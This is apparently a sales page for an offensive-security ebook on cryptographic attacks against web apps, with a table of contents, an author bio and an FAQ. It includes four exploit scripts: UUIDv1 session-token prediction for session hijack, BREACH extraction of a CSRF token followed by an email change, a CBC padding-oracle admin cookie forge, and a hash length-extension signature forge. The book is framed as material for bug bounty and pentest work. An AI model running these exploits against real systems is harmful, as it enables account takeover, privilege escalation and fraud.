AfterMath Series — Book 1

AfterMath Crypto Exploitation Statistical Attacks Part 1 of 3

Not algorithm confusion. Not token forgery. Something deeper. Padding oracles. Compression oracles. PRNG seed recovery. Hash length extension. The server leaks math through its behavior. You iterate. The secret surrenders.

$29 $39 SAVE $10
Get Your Copy

30-day money-back guarantee · PDF format · Instant download

AfterMath: Crypto Exploitation — Part 1 cover
58 Pages
5 Chapters
21 CVEs Covered
4 Attack Families
The Attack Paradigm

Broken Token used FFF (Find, Forge, Fire).
AfterMath uses LIT.

FFF works when you manipulate known structure — a JWT header, an OAuth parameter. Crypto attacks are different. The key is unknown. The format is opaque. What leaks is behavior — and behavior is math.

L Step 01
Leak

Induce the target to emit a behavioral signal that reveals information about secret cryptographic state. A timing delta. A Content-Length difference of three bytes. A distinct HTTP status code. The oracle exists before you exploit it.

I Step 02
Iterate

Apply mathematics to the leaked signal repeatedly. XOR computation. Interval narrowing. Frequency analysis. Seed reconstruction. This is not brute force — it terminates in a bounded, predictable number of steps.

T Step 03
Take

The math converges. Every PoC in this book fires a request and shows a result. Plaintext recovered. Session hijacked. Signature forged. Ciphertext accepted. None end on a hex dump or a theoretical calculation.

Taste the Content

Real math. Real PoCs. No placeholders.

Every technique comes with a LIT-labeled PoC — Leak, Iterate, Take. No theory without payload. Every command tested on Ubuntu 24.

Chapter 2 — Session Entropy UUIDv1 Timestamp Prediction → Session Hijack 
# LEAK — collect token and server timestamp
curl -s -c /tmp/j -d "user=attacker&pass=attacker" \
  -D /tmp/h https://target.com/login > /dev/null
TOKEN=$(grep -i "set-cookie" /tmp/h | grep -oP 'session=\K[^;]+')

# Extract MAC, clock seq and base timestamp from UUIDv1 structure
eval $(python3 - "$TOKEN" << 'PY'
import sys; t = sys.argv[1].replace('-','')
tl,tm,th = int(t[0:8],16),int(t[8:12],16),int(t[12:16],16)&0x0FFF
ts = (th<<48)|(tm<<32)|tl
print(f"MAC={t[20:32]}"); print(f"TS={ts}")
PY
)

# ITERATE — enumerate ±1 second window (10M 100ns ticks)
# base=$TS from eval block above
for d in range(-10000000,10000000,100):
  ts=base+d
  tok=f"{ts&0xFFFFFFFF:08x}-{(ts>>32)&0xFFFF:04x}-..."
  r=requests.get("https://target.com/api/profile",
    cookies={"session":tok},timeout=1)
  if r.status_code==200 and "email" in r.text:

# TAKE — session hijacked, print token and response
    print(f"Hijacked: {tok}"); print(r.text[:200]); break
Chapter 3 — Compression Oracles BREACH — CSRF Token Extraction via Content-Length Delta 
# LEAK — baseline compressed size with neutral prefix
baseline=$(curl -s -o /dev/null -w "%{size_download}" --compressed \
  -H "Cookie: session=$SESSION" "$URL?q=AAAA")

# ITERATE — extract CSRF token character by character
CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
KNOWN=""
while true; do
  best_char=""; best_size=99999
  for c in $(echo "$CHARSET" | fold -w1); do
    size=$(curl -s -o /dev/null -w "%{size_download}" --compressed \
      -H "Cookie: session=$SESSION" \
      "$URL?q=${KNOWN}${c}")
    [ "$size" -lt "$best_size" ] && best_size=$size && best_char=$c
  done
  KNOWN="${KNOWN}${best_char}"
  [ ${#KNOWN} -ge 44 ] && break
done

# TAKE — fire extracted token to perform state-changing action
curl -s -X POST https://target.com/account/email \
  -H "Cookie: session=$SESSION" \
  -d "_csrf=$KNOWN&email=attacker@attacker.com" \
  -w "\nHTTP: %{http_code}"
Chapter 4 — Block Cipher Oracles CBC Padding Oracle — Byte-by-Byte Decryption → Admin Token Forge 
# LEAK — capture AES-CBC token, confirm oracle type
CT=$(curl -s -c /tmp/j.txt -D /tmp/h.txt "$URL/login" \
  -d "user=guest&pass=guest" > /dev/null && \
  grep -i "set-cookie" /tmp/h.txt | grep -oP "(?<=auth=)[^;]+")

# ITERATE — byte-by-byte padding oracle decryption
def oracle(ct_bytes):
  b64 = base64.b64encode(bytes(ct_bytes)).decode().rstrip('=')
  r = requests.get(f"{url}/profile", cookies={"auth": b64})
  return r.status_code != 500  # True = valid padding

for pos in range(block-1, -1, -1):
  pad_byte = block - pos
  for guess in range(256):
    crafted[pos] = guess
    if oracle(crafted):
      intermediate[pos] = guess ^ pad_byte; break

# TAKE — forge admin cookie, submit, confirm escalation
target_plain = b'{"user":"admin","role":"administrator"}\x09\x09\x09\x09\x09\x09\x09\x09\x09'
forged_iv = bytes(intermediate[i] ^ target_plain[i] for i in range(block))
forged = base64.b64encode(bytes(forged_iv) + bytes(C_curr)).decode().rstrip('=')
r = requests.get(f"{url}/admin", cookies={"auth": forged})
print(f"Admin access: HTTP {r.status_code}")
Chapter 5 — Hash Attacks Merkle-Damgård Length Extension — API Signature Forge 
# LEAK — fingerprint MAC construction from signature length
SIG=$(curl -s -D /tmp/h.txt "$URL/v1/action?user=guest&amount=10" | \
  grep -i "x-signature" /tmp/h.txt | grep -oP '[a-f0-9]{64}')
# 64 hex chars → SHA-256 → vulnerable to length extension

# ITERATE — enumerate secret length, forge signature via hash state resumption
for LEN in $(seq 1 32); do
  NEW_SIG=$(hash_extender \
    --data "user=guest&amount=10" \
    --signature "$SIG" \
    --append "&amount=99999" \
    --secret-min-length $LEN --secret-max-length $LEN \
    --format hex | grep "New signature:" | awk '{print $NF}')
  CODE=$(curl -s -o /dev/null -w "%{http_code}" \
    "$URL/v1/action?user=guest&amount=99999&sig=${NEW_SIG}")
  [ "$CODE" != "403" ] && echo "Secret len $LEN — server accepted" && break
done

# TAKE — escalated API action accepted with forged signature
NEW_MSG=$(hash_extender --data "user=guest&amount=10" \
  --signature "$SIG" --append "&amount=99999" \
  --secret-min-length $LEN --secret-max-length $LEN \
  --format hex --out-data-format html | grep "New string:" | awk '{print $NF}')
curl -s -X POST "$URL/v1/action" \
  -d "${NEW_MSG}&sig=${NEW_SIG}" -w "\nHTTP: %{http_code}"
Table of Contents

All 5 Chapters

Each chapter follows the same structure: attack mechanics, framework behavior table, CVEs, LIT-labeled primitives, hunting notes, detection signals.

CH 01
Foundations
Entropy & PRNGs · Session tokens · Side channels & oracles · CBC mode · Hash functions & MACs · XOR & stream ciphers · From FFF to LIT
7 pages
CH 02
Session Entropy
UUIDv1 timestamp prediction · PHP Mersenne Twister seed recovery · Timestamp-seeded token forge · Spring LCG property prediction
9 pages
CH 03
Compression Oracles
BEAST · CRIME · BREACH · Compression Oracle Probe · Express CSRF extraction · Django/Nginx silent compression · Spring Security CSRF downgrade
10 pages
CH 04
Block Cipher Oracles
Oracle Classifier · Error differential decryption · Node.js JWE timing oracle · IV+CBC token forge · CBC mode math · PKCS#7 padding · Lucky Thirteen
13 pages
CH 05
Hash Attacks
Signature Surface Probe · API signature forge · XOR keystream recovery · Merkle–Damgård length extension · Many-time pad · CVE-2025-65945
10 pages
APX
Appendix — Quick Reference
Tool setup (hash_extender, php_mt_seed) · Token decode · UUIDv1 inspector · Block size detection · Oracle classifier · CSRF stability check · XOR analysis
6 pages
What's Inside

Every statistical attack layer

From entropy collapse to timing deltas — every layer where cryptographic implementations leak their secrets through observable behavior.

01
Original Detection Primitives

Oracle Classifier, Compression Oracle Probe, Signature Surface Probe — three original named tools that identify which oracle type the target exposes before running any extraction. No existing scanner packages these as standalone pre-flight checks.

02
PRNG Recovery — 4 Failure Classes

UUIDv1 MAC+timestamp enumeration, PHP MT19937 seed recovery from 2 outputs, timestamp-seeded token forge from HTTP Date header, Spring LCG state recovery from actuator. CVE-2026-40975, CVE-2024-45719, CVE-2025-22150, CVE-2026-41505.

03
BREACH — Nginx Silent Compression

The most common misconception in BB reports: "our app doesn't use compression." Nginx does — silently, at the proxy layer. Django behind Nginx is identifiable by three response headers. The oracle exists at the infrastructure level regardless of app config.

04
Padding Oracle — 3 Oracle Types

Error differential, length differential, and timing oracles require different Iterate strategies. The Oracle Classifier selects the correct strategy automatically. Covers ASP.NET POET, Node.js JWE (GHSA-58f5-hfqc-jgch), Tomcat EncryptInterceptor (CVE-2026-29146).

05
Hash MAC Forgery — One Request

Signature length identifies the hash family. Secret length enumeration (1–32 bytes) confirms raw hash vs HMAC in seconds. Parameter pollution delivers the forged payload. No oracle loop, no timing infrastructure. One tool invocation to forge.

06
Tooling: bash, curl, Python stdlib

No external crypto libraries required for Part 1. All PoCs run on Ubuntu 24 with standard tools plus two compiled utilities: hash_extender (Ch5) and php_mt_seed (Ch2). The appendix provides install commands and test one-liners for both.

Original Research

Named by this book*

Three detection primitives named, framed, and documented here for the first time. No existing tool, scanner, or public resource packages these as standalone pre-flight checks.

Chapter 4 — Block Cipher Oracles
Oracle Classifier

Before committing to a full CBC decryption run, this primitive sends one malformed ciphertext and probes all three oracle signal types simultaneously — error differential, length differential, and timing — then routes automatically to the correct Iterate strategy. Running a padding oracle attack against the wrong signal type wastes hundreds of requests and returns garbage. No existing tool performs this classification step before running.

→ selects correct attack path before extraction begins
Chapter 3 — Compression Oracles
Compression Oracle Probe

BREACH requires three simultaneous preconditions: HTTP-level compression active, attacker-controlled input reflected in the compressed body, and a static secret in the same response. Most hunters check these manually across three separate requests. This primitive automates all three in a single pass — compression header, canary reflection, and token stability — and reports oracle viability with a single command before the extraction loop starts.

→ confirms BREACH oracle in one command, eliminates false starts
Chapter 5 — Hash Attacks
Signature Surface Probe

A 64-character hex signature could be SHA-256 HMAC or a raw SHA-256 hash — identical length, completely different vulnerability profile. This primitive fingerprints the construction behaviorally: it enumerates secret lengths 1–32 and fires forged requests via hash_extender until the server accepts one. Acceptance is binary and unambiguous. No timing analysis, no oracle loop. A raw hash MAC is confirmed or ruled out in under a minute.

→ distinguishes HMAC from raw hash MAC before forge attempt

* Original as of publication date — first named writeup or first standalone implementation for each primitive.

The AfterMath Series

Three volumes. One attack surface.

Statistical attacks are where most real-world cryptographic vulnerabilities live. Algebraic attacks go deeper. Frontier attacks go further. Same LIT paradigm. Escalating math.

Part 1 — Available Now
Statistical Attacks
// behavior is the oracle

Entropy collapse, compression oracles, CBC padding oracles, hash construction failures. Tools: bash, curl, Python. No algebraic solvers required.

  • PRNG recovery
  • BREACH / CRIME
  • Padding oracle
  • Length extension
  • XOR key reuse
Get Part 1 →
Part 2 — Coming Soon
Algebraic Attacks
// math breaks the key

RSA padding oracles, AES-GCM nonce reuse, biased ECDSA nonce lattice reduction. Tools: fpylll, SageMath. Heavier math, same LIT paradigm.

  • ROBOT / Bleichenbacher
  • GCM tag forgery
  • ECDSA lattice
  • Marvin timing
  • Nonce & IV attacks
// in development
Part 3 — Research Stage
Frontier Attacks
// the next attack surface

ZK proof malleability, FHE timing side-channels, generalized lattice attacks. Some chapters may not have real BB targets yet. Forward-looking by design.

  • ZK failures
  • FHE oracles
  • Black-box cryptanalysis
  • Coppersmith
  • LWE misuse
// research in progress
Author
Rodolfo Assis
BRUTE LOGIC · @BRuteLogic
Rodolfo Assis
15+ Years 1,461 Reports KNOXSS Creator Brute One BSides Boston 2016 DEF CON 25 Ekoparty 2025 Top 200 Influencer 2021 6 Ebooks 65K+ Followers

Brazilian offensive security researcher with 15+ years breaking web applications. Creator of KNOXSS — the most comprehensive automated XSS service, live since 2016 — and X55.is, a universal XSS delivery domain. Founder of Brute One, an AI assistant for bug bounty hunting with tool execution capabilities and proprietary offensive knowledge.

Author of: First Bounty, The Brute Art of Bypass, SSRF Mastery Series — Fundamentals, the Broken Token Series, and now AfterMath: Crypto Exploitation. Writing Security in Collapse, a cyberpunk doctrine for the Intelligence Age. Building the King of Noobs recon suite on GitHub — reKover, unKover, disKover.

Spoke at BSides Boston 2016, DEF CON 25, and Ekoparty 2025. Ranked #1 globally on Open Bug Bounty in 2015. 1,000+ vulnerabilities disclosed against Oracle, Apple, Microsoft, Samsung, Slack, Uber, LinkedIn. Listed among 200 Global Cybersecurity Influencers by Check Point (2021).

Questions

FAQ

Who is this for?

Intermediate to advanced bug bounty hunters and pentesters who understand web security fundamentals and want to move into cryptographic attack territory. You should be comfortable reading curl commands and Python. You don't need a math degree — the Iterate step is explained from first principles in every chapter.

How is this different from the Broken Token series?

Broken Token attacks the protocol layer — JWT headers, OAuth parameters, SAML assertions — using the FFF paradigm. AfterMath attacks the cryptographic layer beneath the protocol — the PRNG that generated the token, the cipher mode that encrypted it, the hash function that signed it. These are different attack surfaces. The LIT paradigm replaces FFF because the attacker can't manipulate the format directly — they have to read it through the server's behavior.

Do the commands actually work?

Yes. Every command was tested on Ubuntu 24 before inclusion. No placeholder code. No theoretical payloads. Every Take step fires a real request against a real endpoint and shows a result.

What tools are required?

For Part 1: bash, curl, Python 3 stdlib, plus two compiled utilities — hash_extender for Chapter 5 and php_mt_seed for Chapter 2. Both are open source, install instructions and test commands are in the appendix. No external crypto libraries required.

Do I need to read the Broken Token series first?

No. Each series is independent. The Chapter 4 JWE timing primitive includes a crossover note explaining the relationship between JWE's CBC internals and Broken Token: JWT's algorithm confusion attacks, but Part 1 stands alone.

What frameworks are covered?

Spring Boot, ASP.NET Web Forms and Core, Node.js (Express, Next.js, jose npm), Django, PHP (mt_rand, mcrypt, WooCommerce payment plugins), Java (java.util.Random, Bouncy Castle), Go (Satori UUID). Per-framework vulnerability tables in every attack chapter.

Get the Book

THE MATH BENEATH THE PROTOCOL BREAKS TOO.

58 pages. 4 attack families. 21 CVEs. LIT-labeled PoCs. Every technique tested. No placeholders.

$29 $39 SAVE $10
Buy Now

PDF format · Instant download · 30-day money-back guarantee

AI-assisted creation, thoroughly reviewed by the author. All technical content tested for accuracy.
Errors or suggestions: assis@brutelogic.net